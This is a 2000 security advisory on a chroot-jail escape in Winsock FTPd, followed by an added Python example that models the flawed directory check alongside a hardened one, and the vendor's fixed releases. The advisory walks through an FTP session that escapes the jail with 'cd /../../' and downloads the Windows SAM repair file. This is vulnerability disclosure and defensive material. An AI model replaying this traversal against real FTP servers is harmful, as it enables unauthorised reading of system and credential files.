Subject: Vulnerability in Winsock FTPD 2.41/3.00 (Pro)
From: Interstellar Overdrive (interdriveHOME.COM)
Date: Mon Nov 27 2000 - 09:21:15 CST


[ Overdrive Advisory # 1 ]

---------------------------[ Synopsis ]

 Subject : Vulnerability in Winsock ftpd
 Application : Winsock FTPd v2.41 RC14, Winsock FTPd v2.41 Pro,
               Winsock FTPd v3.00 Pro
 Platform : Win32
 Description : a local user can break the chroot jail
 Date : 11/28/2000
 Author : Interstellar Overdrive
 E-Mail : overdriveworkspot.net
 WWW : http://www.workspot.net/~overdrive/

--------------------------[ Application Info ]

 Winsock FTPd is a common, popular FTP server for Windows 95/98/3.11/NT/2000
by Texas Imperial Software. It is a simple, inexpensive, and easy-to-set-up
FTP server for Windows machines; the current release is v3.0.
 Homepage : http://www.wftpd.com
 Author : Alun Jones <aluntexis.com>

-------------------------[ Overview ]

 In Winsock FTPd there is an option called "Restrict to home directory and
below", where the server makes a chroot jail for the user. Let's take an
example:

-----snip------
c:>ftp target.com
Connected to target.com
User (target.com:(none)): io
331 Give me your password, please
Password: XXXXXX
230 Logged in successfully
ftp>pwd
257 "/" is current directory #io's directory here c:\wftpd\io
       #and it is chroot'ed
ftp>ls
200 PORT command okay
150 File Listing Follows in ASCII mode.
my_file.txt
my_code.c
226 Transfer finished successfully.
11 Bytes received in 0.01 seconds (1.10 Kbytes/sec)
ftp>cd ../../
501 User is not allowed to change to ../../ - returning to /.
ftp>
#until now chroot jail working fine...

#hmmm, lets try doing 'cd /../../'
ftp>cd /../../
250 "/../.." is current directory
ftp>ls
200 PORT command okay
150 File Listing Follows in ASCII mode.
wftpd
inetpub
DOS
WINA20.386
CONFIG.DOS
CONFIG.SYS
WINNT
AUTOEXEC.BAT
Program Files
TEMP
COMMAND.COM
.....etc # cool !
#even more fun
ftp>cd /../../WINNT/repair/
250 "/../../WINNT/repair/" is current directory
ftp>get /../../WINNT/repair/sam._
200 PORT command okay.......etc we got the file...
---------snap-------

The problem is that the chroot jail only works if the user tries ../../../,
not /../../../. By simply adding a "/" before ../../ (a commonly known bug in
Win32 applications), any local user, or even an anonymous user, can change
his working directory to any directory on the server, and therefore download
any file from the server (as you saw above). In other words, the chroot jail
is broken.
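The following is an added example (not code from the advisory or from WFTPD) that models the flawed check described above beside a hardened one: the weak version only refuses requests that begin with "..", so "/../.." slips through, while the hardened version normalises the virtual path first and only then maps it onto the jail root. The jail root C:\wftpd\io and the requests are taken from the session above; the function names are assumptions.

```python
import posixpath
from pathlib import PureWindowsPath

# Constructed values: the jail root is the home directory shown in the advisory's
# session (c:\wftpd\io); the requests exercised below are the ones typed there.
JAIL_ROOT = PureWindowsPath(r"C:\wftpd\io")


def weak_cwd_allowed(requested: str) -> bool:
    """Models the flawed check the advisory describes: only a request that
    begins with '..' is refused, so '/../..' is accepted and leaves the jail."""
    return not requested.startswith("..")


def resolve_in_jail(cwd: str, requested: str) -> PureWindowsPath:
    """Hardened check: normalise the virtual path first (so '/../..' collapses
    to '/', as it would inside a real chroot), then map it onto the jail root
    and confirm the result is still inside the jail."""
    # Win32 APIs accept backslashes as separators, so treat them as '/' too.
    req = requested.replace("\\", "/")
    # A relative request is resolved against the current virtual directory.
    virtual = req if req.startswith("/") else posixpath.join(cwd, req)
    # Force exactly one leading '/', then let normpath resolve '.' and '..';
    # '..' above the root of an absolute path is dropped rather than honoured.
    normalized = posixpath.normpath("/" + virtual.lstrip("/"))
    parts = [p for p in normalized.split("/") if p]
    # Defence in depth: refuse any leftover parent reference or drive-letter
    # component before anything touches the filesystem.
    if any(p == ".." or ":" in p for p in parts):
        raise PermissionError(f"refusing {requested!r}: invalid component")
    fs_path = JAIL_ROOT.joinpath(*parts)
    if fs_path != JAIL_ROOT and JAIL_ROOT not in fs_path.parents:
        raise PermissionError(f"refusing {requested!r}: escapes {JAIL_ROOT}")
    return fs_path


def virtual_cwd(cwd: str, requested: str):
    """New virtual working directory the client would see, or None if refused."""
    try:
        fs_path = resolve_in_jail(cwd, requested)
    except PermissionError:
        return None
    rel = fs_path.relative_to(JAIL_ROOT).as_posix()
    return "/" if rel == "." else "/" + rel


if __name__ == "__main__":
    for request in ("../../", "/../../", "/../../WINNT/repair/", "C:/WINNT"):
        print(f"{request!r:24} weak={weak_cwd_allowed(request)!s:5} "
              f"hardened={virtual_cwd('/', request)}")
```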

Vulnerable Winsock FTPd Applications Found :

 Winsock FTPd v2.41 RC14
 Winsock FTPd v2.41 RC14 Pro
 Winsock FTPd v3.00 Pro

-----------------------------[ FIX ]

 Vendor contacted; a new release of Wftpd is out
 which fixes the problem:

 - Wftpd v2.41 RC15
 - Wftpd v3.00 R2
 <http://www.wftpd.com>

-----------------------------[ Credits ]

 Interstellar Overdrive (interdrivehome.com - overdriveworkspot.net)